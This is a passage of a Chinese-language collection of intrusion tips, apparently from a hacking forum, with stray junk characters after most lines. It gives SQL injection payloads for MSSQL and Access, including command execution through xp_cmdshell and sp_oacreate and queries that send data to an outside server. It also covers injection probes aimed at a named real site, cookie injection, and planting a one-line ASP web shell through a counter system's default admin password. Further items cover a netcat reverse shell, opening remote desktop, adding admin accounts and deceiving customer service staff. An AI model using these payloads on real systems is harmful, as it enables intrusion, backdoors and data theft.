SA点数据库分离技术相关
" M/ y* J: N' b& Z% u# E, I* \% v1 `/ }8 _% U% W4 o
" _7 N+ m8 t- {6 g8 ]
SA点数据库分离搞法+语句:; i4 N. \0 d7 c5 O
) e1 F. b( m/ V. ^注射点不显错,执行下面三条语句页面都返回正常。% u0 ]) s: h0 l- {1 d. i2 T
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread'); u' w7 Y, C8 y) U% q
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')1 y' N7 s: c. _7 y& R% C
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell') \! D$ A" ?3 B9 J. |/ Y1 u- S* r8 w
可以列目录,判断系统为2000,web与数据库分离0 e& Y1 _6 D, n0 A; P5 V# P" ?
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。9 v, H4 V' |- ^, k! d5 ]
在注射点上执行
7 }; d/ f2 h3 c9 s8 T$ d* jdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
3 _9 z: C2 w6 t [8 m- _ o页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
$ j1 K; ?7 n) i还有我用NC监听得其他端口都没有得到IP。$ t0 p, }/ H2 e2 @# n& T9 L
/ ]- J6 F! ^* Y
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
7 g3 M$ A$ n4 q: \3 `'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--' B$ T) b. Y& F, s
% t1 L/ A$ O" [+ ~: z9 e! L: C" R;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
6 J! P7 Y7 R6 _- |9 N
7 ]; O' G! t8 R5 O, z9 ]' L( {现在就猜想是不是数据库是内网而且不能连外网。
; {5 M0 {! r$ v) S% D4 p8 e& I- d7 f8 {3 h3 R" d2 b% N4 b
: }2 j! I2 o& ~; p/ P2 ?7 S% b' Y% vaccess导出txt文本代码6 s8 s6 a3 s) g5 d% J8 K; I
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin
' r8 U" Z( n2 c, \' D
. T7 I+ U6 L" ~& a7 c3 H( r/ Z0 }2 n+ c) B" y. ~
! o a3 [/ K' t+ ?
自动跳转到指定网站代码头
6 O0 S2 S( G# E3 l# [% y; d, ^<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
8 E; ^, a: Z, f" B
7 x4 Y/ r; ^- W; [8 O) o; \
9 ]! |$ M% v+ k6 e) L \& @7 y入侵java or jsp站点时默认配置文件路径:
; I u5 e8 C+ W: k; l\web-inf\web.xml
" w1 w$ H) _& v# p' S6 Dtomcat下的配置文件位置:
+ F) i4 J3 a+ V7 {) i' n7 o9 z\conf\server.xml (前面加上tomcat路径)
# H; E. }. S" A\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
3 }% ~0 [/ t% r! v+ r9 T* ]9 e( ^, v; k0 h) {: j& `- b
7 ?& I# K: W8 }9 ^" E6 t
/ f( u: k. Q" _- z9 }8 m1 y. I, Z检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:" ]7 G+ t, G) W4 N
-1%23
. t- Y1 H4 ~0 }% r; p> + \- H4 I- W6 A* y+ J1 D2 ]7 w
<
' t. l8 m6 P9 @% l2 f$ C0 @1'+or+'1'='1
. F) X5 ?3 ~8 u) M) @$ _id=8%bf( y, h8 t0 V7 m% E2 a* v) |' o7 A4 W
+ O. z! V8 E( A& r# g$ i
全新注入点检测试法:
3 p1 d7 P8 a* S8 {在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。4 u$ K" y2 }* t h
C, f* g/ r# E在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。1 ^* G7 m7 d& f/ V* ~/ E) L
& L2 d! t! n0 `
搜索型注入判断方法:% M6 ] j/ b1 k$ Z: V
北京%' and '1'='1' and '%'='% ^. [ E& b/ R: ^0 V [( F% Y3 j& ]
北京%' and '1'='2' and '%'='
& b, c' e- R: E0 g; Y8 v2 z2 w9 T6 l/ m6 q7 h! @5 e) k
+ _8 u& Q0 `! n1 G% L+ ~
COOKIES注入:9 L* S% H( o% `4 i) h/ ~$ [+ i
, k% u4 t. M+ Djavascript:alert(document.cookie="id="+escape("51 and 1=1"));7 T, y: z: x1 {8 ~+ A' |! x' B7 s
6 d% W1 C( k7 _/ y$ V1 ?+ B' o' f! F6 M
2000专业版查看本地登录用户命令:4 B! E4 I9 |, Z ]; Y$ t
net config workstation; _$ q/ E8 e1 K. V. \
/ Q2 _( b6 V+ a5 g" t$ Y! N$ a' @! P
2003下查看ipsec配置和默认防火墙配置命令:
) e- v+ X# ^; W3 t) w1 {, D+ enetsh firewall show config @% G9 P$ H) q
netsh ipsec static show all# H, |0 C4 Y4 _$ y, p0 x
. ?3 }! N; n/ L6 r% p, u4 O. d8 u- R
不指派指定策略命令:) z0 N8 ~0 l- @3 F5 K
netsh ipsec static set policy name=test assign=n (test是不指派的策略名)
1 q' w( y# G# Y. I$ onetsh ipsec static show policy all 显示策略名
+ a1 ~$ R. B' U# E4 I% b. ~4 K
2 ~" ^( D, @. g, ] m+ S! H i5 q- K
猜管理员后台小技巧:
. B# Z# C% }2 _9 wadmin/left.asp 1 N! O, k6 Z7 D# \% L7 z4 N
admin/main.asp# w, \& `8 ~1 ?% B% t4 A9 u( y
admin/top.asp- `4 y: U$ g/ A, Y+ d0 p; y
admin/admin.asp 1 k& {9 K5 }7 W: z
会现出菜单导航,然后迅雷下载全部链接! _5 x- w; Z& A. c9 B# z1 e
! D6 x9 [. h \( |3 J! ~. M& r$ j: b
; i0 |( V- H+ {% z5 A7 N: B; L社会工程学:# G& r' U6 M4 {& T0 A# ~ @
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人8 u0 u' `. H7 O1 }* m) G7 Z
然后去骗客服! L7 y: V- h- U. f: m, }
! W% i3 M# e# P1 L( f, v5 o
+ z3 k/ ^! h2 I统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: ; @0 @1 l4 }- {+ Q2 `% {! K
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, 3 x) B2 }, ?; G- u. e
存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
3 Y: o8 d V" s1 O0 Q- Z/ W9 ~3 d* S: i5 V& U& k
0 \3 L) z% A# N6 ]; j) b
7 m m8 r: [2 u( [. q
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)- D. |2 i, W' c/ x3 r
+ x2 G& m* s# g8 {( N; Y- T$ W' O7 S9 `$ v4 Y
( j% z% J& e' d+ j kCMD加密注册表位置' L1 e3 Q. _6 l' K
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor* H( {& ^" `( w
AutoRun
6 i1 L7 l. U1 p3 t4 d3 P" }$ Y
& _8 B2 X- g7 M(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor- ?! }* v* A1 }5 }* C- Q5 [
AutoRun
# c3 D6 O L: @3 Z( ?& i6 i; s7 j4 ^" e) y: |# q
# _" t0 M3 P, i
在找注入时搜索Hidden,把他改成test
3 n9 Y2 S- Z) F) W' H
- y! l1 Z& @- g7 @3 k( x0 p, h- g" N% W; Z' Q2 s
4 t0 _5 i w0 B$ ^9 k. L% Pmstsc /v:IP /console y& n- E( Y$ d$ F a. K% e" m7 r
4 k9 C8 R8 [' ^ A2 Q9 b" S
, a( W' T+ b$ I* [( Y: H, q$ b6 F一句话开3389:3 I- {4 M3 P7 g( h
; c7 x5 V2 H2 q* \' Z9 @8 T
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH> , I4 M, A5 u n1 S7 { H3 q
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
/ V' Y& d1 n* d# J# U$ W4 \" u5 r2 B9 ]) ~5 v
( f7 Y5 @; H1 i1 ^2 H- f3 k) n; j
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
8 t/ Q- n. {: O- f6 }Insert into admin(user,pwd) values('test','test')3 {! h. t' b$ |9 L, E
& O8 O1 J7 J% E9 ]' ~' x
X* r% C1 {3 O1 i( ]6 {) S7 d! ENC反弹
. Y4 ^8 l$ v7 ]5 }& D先在本机执行: nc -vv -lp 监听的端口 (自己执行)
7 }+ q- `* H! _& z5 L* a6 Z; ~然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
% L6 D/ \/ b0 L7 \7 l
+ \- F( P- r, k0 O4 \ n4 ^1 |, I5 L' M
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
0 a9 w3 `2 F- X- k, [! p. ?, T
* v) e5 f5 y; O+ ?. l2 d有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录% v9 i+ _/ J2 }: |
例如:
8 h9 m* a3 x7 x: jsubst k: d:\www\ 用d盘www目录替代k盘( O, N8 ^2 _, k( t
subst k: /d 解除K盘代替 |